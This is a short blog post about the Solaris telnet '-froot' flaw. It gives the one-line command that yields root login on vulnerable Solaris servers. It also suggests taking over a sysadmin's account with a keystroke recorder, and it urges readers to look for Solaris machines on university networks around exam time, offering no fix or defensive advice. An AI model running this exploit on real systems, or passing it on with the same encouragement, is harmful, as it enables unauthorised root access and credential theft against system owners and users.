If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:
$ telnet -l "-froot" server
server is the server name. I was able to confirm this on a Solaris server nearby.
It’s amazing to see that this one was overlooked for SO much time, and how using this exploit does not require any skill whatsoever. If root logins through telnet are disabled, you may still be able to login as any other user (think sysadmin’s user account + keystroke recorder)
While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits — the exam period is just over the corner 🙂
Source: Errata Security blog.